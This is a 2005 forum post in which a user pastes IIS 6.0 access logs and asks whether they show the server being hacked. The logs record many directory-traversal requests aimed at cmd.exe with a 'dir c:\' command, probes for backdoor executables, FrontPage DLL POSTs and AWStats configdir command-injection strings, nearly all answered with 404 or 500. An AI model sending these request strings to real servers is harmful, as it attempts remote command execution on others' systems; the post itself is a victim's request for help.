OMG Is this a logfile of me being hacked on IIS

**treanglin** · June 3rd, 2005, 08:26 PM

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 03:01:32
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 03:01:32 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.184.150 - 500 0 126
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 05:02:22
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 05:02:22 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.235.161 - 500 0 126
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 10:56:17
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 10:56:17 192.168.1.108 HEAD /iisstart.htm - 80 - 68.36.205.30 - 200 0 0
2005-03-05 11:08:09 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:09 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:10 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
2005-03-05 11:08:12 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:12 192.168.1.108 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:15 192.168.1.108 GET /_vti_bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:15 192.168.1.108 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:17 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /adsamples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:18 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:20 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 64
2005-03-05 11:08:21 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:21 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:21 192.168.1.108 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:22 192.168.1.108 GET /_vti_cnf/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:22 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:22 192.168.1.108 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:23 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:23 192.168.1.108 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:25 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:25 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:26 192.168.1.108 GET /samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:29 192.168.1.108 GET /scripts/line.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:29 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/cmd1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/bs.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:31 192.168.1.108 GET /scripts/sensepost.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /scripts/kimroot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /scripts/win32.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:32 192.168.1.108 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:34 192.168.1.108 GET /scripts/eXe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/sys.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/boot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:34 192.168.1.108 GET /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:35 192.168.1.108 GET /scripts/lol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/exe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/cmd3.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:35 192.168.1.108 GET /scripts/superlol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:36 192.168.1.108 GET /scripts/a.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/monkey.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/max-loh.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/winelt.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /scripts/exchange.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:37 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:38 192.168.1.108 GET /scripts/rundll.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/un.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/script.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/cmd2.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/some.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:38 192.168.1.108 GET /scripts/drone.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/****.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/Serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:39 192.168.1.108 GET /scripts/z.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/echo.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:39 192.168.1.108 GET /scripts/ccc.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/sykon.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:39 192.168.1.108 GET /scripts/root1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:40 192.168.1.108 GET /scripts/smss.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:40 192.168.1.108 GET /scripts/az.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:40 192.168.1.108 GET /scripts/aagweb.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:43 192.168.1.108 GET /scripts/mkhe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
2005-03-05 11:08:43 192.168.1.108 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:45 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:45 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:48 192.168.1.108 GET /scripts/test.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:49 192.168.1.108 GET /scripts/shell.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
2005-03-05 11:08:50 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2005-03-05 23:00:37
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
2005-03-05 23:00:37 192.168.1.108 GET /cgi/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3

Thread: OMG Is this a logfile of me being hacked on IIS

Thread Tools

Display

Threaded View

OMG Is this a logfile of me being hacked on IIS

Posting Permissions